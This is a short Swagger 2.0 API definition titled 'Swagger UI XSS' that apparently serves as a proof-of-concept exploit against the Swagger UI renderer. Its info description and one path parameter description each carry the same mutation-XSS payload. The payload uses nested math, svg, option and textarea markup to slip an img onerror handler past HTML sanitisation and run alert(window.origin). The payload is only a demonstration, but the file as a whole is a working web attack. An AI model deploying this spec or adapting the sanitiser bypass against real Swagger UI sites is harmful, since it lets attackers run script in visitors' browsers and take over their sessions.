swagger: '2.0'
info:
  title: Swagger UI XSS
  description: |
    <math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title="</textarea><img src='#' onerror='alert(window.origin)'>">
  version: production
basePath: /XSSResource/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
paths:
  /lpha3ch0:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - lpha3ch0_XSS
      operationId: findAccounts
      summary: Finds all accounts
  '/hack/hackid/{id}':
    delete:
      parameters:
        - description: |
            <math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title="</textarea><img src='#' onerror='alert(window.origin)'>">
          format: int64
          in: path
          name: id
          required: true
          type: integer
      responses:
        '200':
          description: No response was specified